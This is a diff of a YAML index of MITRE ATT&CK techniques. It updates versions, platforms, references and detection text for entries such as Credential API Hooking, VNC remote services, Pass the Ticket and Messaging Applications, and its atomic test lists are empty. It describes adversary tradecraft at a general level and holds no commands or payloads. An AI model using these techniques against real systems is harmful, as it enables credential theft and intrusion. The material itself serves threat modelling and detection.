+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -41264,6 +41951,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -41273,7 +41961,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -41289,66 +41976,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -41373,11 +42061,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -41400,9 +42088,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -41453,7 +42140,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -41517,7 +42203,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -41588,7 +42273,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -41625,7 +42309,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -41656,8 +42340,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -41740,12 +42422,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -41772,6 +42453,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -41789,12 +42471,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41820,14 +42502,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -41945,7 +42626,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -41999,11 +42679,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42055,14 +42734,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -42148,12 +42826,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42173,6 +42850,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -42180,7 +42858,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -42196,39 +42873,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42253,12 +42931,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -42272,13 +42949,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -42295,7 +42971,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
